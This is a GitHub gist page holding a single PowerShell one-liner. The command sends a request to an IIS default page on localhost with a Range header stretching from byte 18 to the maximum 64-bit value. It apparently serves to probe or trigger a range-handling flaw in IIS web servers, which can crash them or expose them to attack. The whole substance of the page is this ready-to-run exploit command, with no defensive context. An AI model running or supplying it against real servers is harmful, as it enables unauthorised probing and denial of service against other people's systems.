Skip to content

Instantly share code, notes, and snippets.

@obscuresec
Created April 15, 2015 18:14
Show Gist options
  • Star 6 You must be signed in to star a gist
  • Fork 3 You must be signed in to fork a gist
  • Save obscuresec/5843025e9fee9353935b to your computer and use it in GitHub Desktop.
Save obscuresec/5843025e9fee9353935b to your computer and use it in GitHub Desktop.
powershell -com {$wr=[Net.WebRequest]::Create('http://127.0.0.1/iisstart.htm');$wr.AddRange('bytes',18,18446744073709551615);$wr.GetResponse();$wr.close()}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment